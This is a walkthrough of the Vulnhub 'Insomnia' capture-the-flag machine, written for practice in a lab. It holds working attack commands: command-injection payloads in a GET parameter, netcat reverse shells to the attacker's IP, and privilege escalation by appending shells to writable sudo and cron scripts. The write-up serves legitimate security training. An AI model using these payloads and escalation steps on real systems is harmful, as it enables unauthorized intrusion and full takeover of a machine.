Insomnia is an easy machine from Vulnhub by alienum. We have to understand LFI, RCE, sudo abuse and cron job abuse to get to the root machine. Here, I will be doing the full method, i.e. getting the user flag first and then getting the root flag. However, once you get the foothold, you can directly go for the root access but this is not intended by the author. “Insomnia Walkthrough – Vulnhub – Writeup”.
Link to the machine: https://www.vulnhub.com/entry/insomnia-1,644/
Walkthrough of Orasi machine by the same author
Identify the target
We have to identify the IP address of the target first.
fping -aqg 10.0.2.0/24
I got my IP address as 10.0.2.15 and that of the target as 10.0.2.114.
Scan the open ports
Next, we have to scan the open ports on the target so that we get the services that we can interact with.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.114
There is only one port open. So, we might have to go deep and not wide which is easier in my view.
Enumerate the web server
The default page has a simple chat interface that works one way only.
When we do a directory scan, we can get new paths.
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt -u http://10.0.2.114:8080/FUZZ -of html -o dir.html -fs 2899
The chat.txt path stored the chat messages.
However, the administration.php file had something interesting.
We can see from the screenshot above that it might be expecting something after the colon symbol. Then, I checked the chat page.
Here, we can see a line on the chatbox. So, we can guess that the file was expecting something. Therefore, I tried fuzzing the get parameter.
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.114:8080/administration.php?FUZZ=anything' -of html -o admin-get.html -fs 65
Luckily, we got a get parameter logfile that also allowed file inclusion and code execution.
Well, it’s not file inclusion but based on the file, it performed some operations. Thus, let’s try a different payload.
?logfile=chat.txt;whoami
This gave the execution of the command whose results we can see on the chatbox. Hence, we can try spawning a reverse shell on port 9001.
# on local machine
nc -nlvp 9001
Let’s check if the target has netcat available.
?logfile=;which nc
Since it has netcat, we can connect to our port.
?logfile=;nc -e /bin/bash 10.0.2.15 9001
Finally, we got the foothold.
Upgrade to an intelligent reverse shell
Get a user’s access
Next, I checked the sudo permissions of the user www-data.
sudo -l
From the screenshot above, we can see that the user can execute a script without requiring a password as the user julia. So, I checked the permissions on the file.
cd /var/www/html
ls -al
It allowed other uses than the owner root to write on it. Therefore, I added the binary bash at the end of the script.
echo '/bin/bash' >> start.sh
So, now, if we execute the script as the user julia, we will also be executing bash as the same user.
sudo -u julia bash /var/www/html/start.sh
Finally, I got the user’s flag.
cd
ls -al
cat user.txt
Root privilege escalation
When I looked at the crontab, I got a script being run every minute.
cat /etc/crontab
Then, we can check the permission of the script as well as we did for the previous script.
ls -l /var/cron/check.sh
It also had access to writing for other users. However, since this runs in the background, it’s better to spawn another reverse shell.
nc -nlvp 9002
So, I added the code to spawn a reverse shell on the script.
echo 'nc -e /bin/bash 10.0.2.15 9002' >> /var/cron/check.sh
After some time, I got the reverse shell. Finally, I got the root flag.
cd
ls -al
cat root.txt